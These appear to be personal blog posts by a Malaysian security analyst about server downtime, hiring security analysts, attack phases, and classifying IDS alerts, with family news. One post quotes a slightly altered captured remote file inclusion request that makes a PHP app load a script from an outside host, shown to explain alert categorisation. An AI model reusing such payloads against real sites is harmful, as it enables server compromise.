Ayoi's

received﷊email from my hosting provider that they are going to perform server relocation or migration which will resulting approx. 8 hours downtime on 30th nov. meaning my sites inaccessable for that period.

p/s: using wifey S.E P1i to post this entry. it seems that stylus is not meant for me. id stick to my lappy keypad

This is the message that I get when I’m updating or patching(?) my vmware FreeBSD 6.2 release via freebsd-update. (OK it has been quite sooooooooooooooooooooome time I did the last update)

WARNING: FreeBSD 6.2-RELEASE-p4 is approaching its End-of-Life date.
It is strongly recommended that you upgrade to a newer
release within the next 2 months.
ayoi# freebsd-update install
Installing updates… done.
ayoi#

The line is damned freakin slow to download the iso btw.

Well thanks to a commenter who leaves a comment on my post here. Anyway I think I have to answer his queries accordingly as to clarify few things

Ok, first of all why security.org.my and not ITTUTOR, HITB etc etc?

1st. I can say I know at least one person behind security.org.my and AFAICS that I think I am comfortable of working with him. Most of the time we share the same view. And sadly I can’t say likewise to other sites and portal because I dun know who the creator etc.

2nd. I’ve been given the privilege to see the layout of this site which I believe can only give benefits to security community in our country.

3rd. I dun see that the site is one of the advertising or propaganda tools for certain companies. If I’m not mistaken there’s a disclaimer that state
”
DISCLAIMER
All data and information provided on this site is for informational purposes and on an as-is basis.

This weblog does not represent the thoughts, intentions, plans or strategies of our employers. It is solely our opinion and views as security professionals.

Feel free to challenge us, disagree with us, or even tell us that we are a complete mindless and brainless monkeys in the comment section of the blog entry.”

Anyway if that site is used for advertising and promoting certain companies, then of cause my Bosses who also read my blog will act accordingly.

There are lot of projects that you can participate. Like PADS, tcpxtract, fl0p sig database, virtual appliance or even you can start providing any interesting packet/traffic analysis, IDS signatures etc and maybe articles or howtos. Like I said, sharing is caring.p/s: I never ever said that other sites are not good or not beneficial to others because they are good and the moderators are very knowledgeable and helpful with their answers.

Recently my friend express his frustration on the candidates that came for Security Analyst interview at his company. He commented that most of the candidates failed to grep/understand the fundamental of networking (nevermind about security tho). And what made him more frustrated was some if not most of the candidates current position at their respective company is Security Analyst. It sparks a question on how did they perform their daily tasks when they failed to master of having the fundamental knowledge on the tasks that need to be performed. I have to agree on his comments and complaints as I’ve experienced these myself when conducting interviews some times ago (well I’m not in the interviewer panel anymore as I suspect maybe the management thought that I am too selective and in hiring Security Analyst)

Perhaps I could list down few things that make these candidates failing their interviews.

a). Most of the candidates obviously failed to do some minor research/reading on the job that they applied. In that sense they are quite lost when asked few job related questions.

b). Failed to convey their message to the interviewer. In other words lack of communication skills. Some candidates that I interviewed even mumbling when asked question that they consider quite difficult to answer.

c). Lack of self confidence. IMHO, confidence come when we are prepared either mentally or physically. So one of the good way to enhance your confidence level is to avoid reason (a).

d). Lacking of fundamental knowledge. This is so obvious. A Security analyst especially Network Security Analyst shud at least know the basic network knowledge. Things like protocols, stacks or layers, traffic patterns and others. It is surprising to know that tcp handshake is considered as something new for some of them or when scanning and exploitation is considered as the same thing.

I think for a start, we can assists or provide as much help as possible via knowledge sharing. An awareness on the security itself also can be a good foundation in providing a proper understanding on this subject. For my Security Colleagues all over Malaysia, perhaps we can share the way we perform our analysis or the way we conduct our Detection process. Maybe we can share knowledge on the analysis techniques or data collection techniques or tools used which I believe can only benefit us all. We might share information on attack traffics patterns, their signatures, countermeasures, incident handling or even detection rules. For undergrads who have ambition in Security field, maybe we can provide a proper roadmap, knowledge and skills required to hold any position in this field. I think we also can provide the real working situation or environment which perhaps can provides any potential candidates on what to be expected once you’re in.

I alone dun have sufficient knowledge to provide all of the above and that’s why I believe for a start, security.org.my can be a good platform for this purpose. I do believe there’s no such thing as too late to start learning. Sharing is caring

For those of you (especially in Malaysia) we have one site dedicated on security scenery in Malaysia. For time being it consists of some news and security related howtos. But in the future, that site will have news/articles/postings to cater all kind or level of readers. Either you are a student who has interest to join in the security field, a security practitioner who wants to learn or exchange new methodology and knowledge or you are a decision maker who decides on the security implementation on your organization. Saying that doesn’t mean that that site is not for those who don’t have any interest in security, perhaps after visiting the site, you might get the general knowledge on what is security all about and perhaps it can spark any interest in this field for you.

I for one hopefully can contribute few things especially on the security awareness to users (having firewalls installed doesn’t mean you are secured) thingy. I think the site owners also welcome any inputs/views/opinions/suggestions or even articles regarding the security state of our beloved country, Malaysia.

http:\\security.org.my  <— my mistake. err you can use this as well what

http://security.org.my

I’ve read one “hot” email from one of my colleagues (he is the one who replaces my task) from our Client site at Jeddah. He is kinda pissed off with our SA here (perhaps I was included as well). I dun blame him at all. I know exactly how he felt, assaulted from left, right, up, below on issues that sometimes has nothing to do in our scope of work there. I do pity him actually.

To be honest, I am tired of giving pep talks to these fella here. Why?

1st, they all grown up men and most of them are fathers and I dun know how can I do anything to change the attitude

yeah, I’ve few discussion, chit chats with other colleagues and all of us agree that attitude is the main characteristic that will determine  how progressive you are in this field. I dun think this spoon-fed culture is suitable. TO be frank, when I first join this current company, I have either less or shallow knowledge on the security. But before I start to do the job, I make sure that I can perform the task of a security analyst (initially it was IDS analyst to be exact). And thank God i was introduced to the proper definition of security and the tasks/processes, skills, knowledge required for an analyst to be a real analyst.

Now? I am still learning, but alas I need counterpart who can argue with me or sharing some knowledge especially in this field. For some reason I do feel that the improvement is at tortoise rate.

Got few projects in hand and hopefully I can fulfill it all.

p/s: To my colleague there at Jeddah. Hang on brother.

Sometimes my consultant will come and see me to verify events that occurred to our clients. This is due to some of the alerts or events have been categorized wrongly. It is not the SAs fault as IMHO the category listed in our system is lil bit confusing. The problem occurred when it comes to Scanning and Hacking Attempt category. So I decided to express my view in the email and of cause as I am a caring person (sharing is caring) I will post on this matter here.

1st of all regarding Scanning or vulnerability scanning. Scanning or vulnerability scanning is a process or activity of gathering information. We also can call this reconnaissance. If we remember, there are 5 stage or phases of attack which is reconnaissance, exploitation, reinforcement, consolidation and pillage. Let me list down the phases and its brief description.

1). Reconnaissance
Processes of validating connectivity, enumerating services, and checking for vulnerable applications. In other words information gathering process

2). Exploitation
Process of abusing, subverting, or breaching services on a target. Abuse of a service involves making illegitimate use of a legitimate mode of access. For example, an intruder might log in to a server over Telnet, Secure Shell, or Microsoft Terminal Services using a username and password stolen from another system. This is the process where the attacker will use his exploits tools on the vulnerability he discovered during the reconnaissance process.

3). Reinforcement.
This is the process where the intruders or attackers trying to gain the total (if not near total) control of the compromised machine. Some exploit may only give user access to the attacker. In reinforcement process attackers will try to escalate the access or privilege of his user.

4). Consolidation
This is when the attackers successfully establish communication with the compromised machines via newly created channel (usually thru backdoor etc). The favourite communication method is via IRC channel (as the attacker can hide behind anonymous or false identity)

5). Pillage
The execution of the main purpose of the compromise. DDoS is one of the favourite intention.

Again the phases mentioned above is merely just to categorize the attack phase. Some of attacks perhaps skip one or two of the phases (usually tools that has script and came from unstructured threat). For example, Nessus scanning may be categorized as scanning as it merely notify the attacker any vulnerability that may exists on the targeted machine. Attacks that generate Remote Include Path alerts are the good example of the difficulties that may exists in categorizing the events. Why? Because there are times when these alerts triggered hundred of times and the time gap between each alerts is small (in seconds). How to categorize these? For me it is simple.

Based on the payload itself. determine what is(are) the attackers doing. For these Remote Include path alerts, most of them didn’t do any reconnaissance at all which straight to the exploitation phase. I suggest it shud be categorized as Hacking attempt. Why? As shown by the sample payload below there is no attempt on identifying on the application information (most of the time the methodology is the same), and the attacker straight away instruct or attempt to instruct the application to run his exploit located on another server.

/G3T /admin.php?lnclude_p4th=http://www.reasons.org/tnrtb/wp-content/backup-b2b23/id2.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.blabla.com.my
User-Agent: libwww-perl/5.808

*I have to change few characters as the mod_security will not allow these to be published.

So I recommend that for SAs to categorize their alerts or events, identify the intention of the attackers. Thats why NSM data is important for identification process.

So what do you think?

p/s: Btw the phases and more on the NSM can be read at taosecurity.blogspot.com or buy the book: The Tao of Network Security Monitoring-Beyond Intrusion Detection by Richard Bejtlich

Anyway for anybody who feel offended by my last post here, I didn’t mention any names rite and of cause I did point out many many times during my years at The Client site on the importance of knowing, learning, acquiring the knowledge, skills of a security analyst. I do not feel myself need to apologize for the post anyway

Our Middle East Project Team had a meeting yesterday regarding on the adding values in our reporting to our clients there. There are many arguments, suggestions, opinions aired in that meeting which I dun think appropriate to be posted here. Do not get me wrong, it is not heated meeting, just a normal meeting (OK because our CSO attended the meeting as well). My PM asked

“If there is any company(competitors) that can provide or give assurance that their product can guarantee of the future security.”

I just smile (I think I do laugh a bit) and shook my head. Just a simple “No” came out from my mouth. To be honest and frank, I am tired of speaking about security to my team (I think countless of time that I do mention about the process etc whether in my training, email discussion and many others). Still they (I think it is more on these management people) for some reason dun want to hear/listen to what we (the technical guys) said or told them). We had few arguments during at the Client site there in Jeddah and I do lil bit surprise to hear that question came out from him.

Anyway, I’ve read about the Proventia IPS taunted as the Security Silver Bullet (Ok it is in 2003) at taosecurity. Actually the posting is about Deflecting the Silver Bullet, Educating the Management not the User (Why I do feel that this is more than appropriate?Hehehehe). It is true that there’s no all in one solution that can guarantee your network/systems secured by just implementing that solution. I guess what these solutions can do is to minimize the risk of the network/systems from being breached.  Did your car alarm prevent car thieves from stealing the car? Did having a CCTV installed in your house prevent any burglary from happen? Or the watch dogs can assured that your premises will not be intruded in the future?

What those things do is to make the thieves think twice from commit any criminal act against your property or those devices only can raise the difficulty level higher with the hope of to dampen any attempt of breaking in.

Anyway what are the purpose of having those things when there is no one to react on the information produced by those devices? What are the purpose of having car alarm when nobody is going to take any action when they hear the alarm, same as when nobody is monitoring the CCTV, then the real purpose of having it installed is not met. What are the purpose of having the latest IPS/IDS/Firewalls when there is nobody who can interpret/translate/understand the proper functions of this device and the outputs/informations produced by them.

It is surprising to know that STILL somebody attend an interview without doing some minor/major research on the job that he or she applied. Interviewers sometimes will ask some tricky questions that need calm heads to answer or to identify the trickiness of the questions. Also interviewers also are human being who understand that you might have some interview jitters or few butterflies in the stomach, so as to give you a chance, they might ask you to submit a written answer to them usually via email (I think these interviewers are so kind and really want you to have the chance to get the job).

It might be understandable if you can’t answer questions like during the interview,

*For ICMP packet especially while using the ping command, which destination port the packet will be sent?

*What are the protocols that exist/located at the application layer?

*What are the usage of DRP flags in TCP?

But what I cant understand is why these candidates failed to provide a proper or correct answers for the questions above in their email. I do wonder whether they ever use any of the internet search engines available freely. During the lunch time just now I did have some chit chat with my colleagues. I did point out that interview can be a good indicator of whether the knowledge that you have is sufficient enuff in the industry besides of learning in improving our own communication skills especially in conveying our messages and thoughts. But then again first of all a good research must be done. If not all you can do is embarrass yourselves.

*Questions courtesy of mr geek00l  

My immediate Boss told me last week that I might have to assist him on the company’s project at one of the Gulf Countries. The duration? 3 freakin years. It is not definite yet but just like the news that I have to go to Jeddah last time, I think it’s 60% true. Anyway he added that I can bring my family along this time if these things confirmed. (We do get the project, only the man power is still undecided). I told wifey about this and she okay’ed it.

If I do have to go, then I do need to have my family along. 6 months I still can accept being away from my family but years? I’ll missed my twin growth from the moment they learn how to talk, sit, crawl and walk and there is no way I want to miss that.. Damned, even Iman produced a shock sound when she saw me at the airport the moment I reached KL from Jeddah and I only left for two months. I can’t imagine if I am gone for years..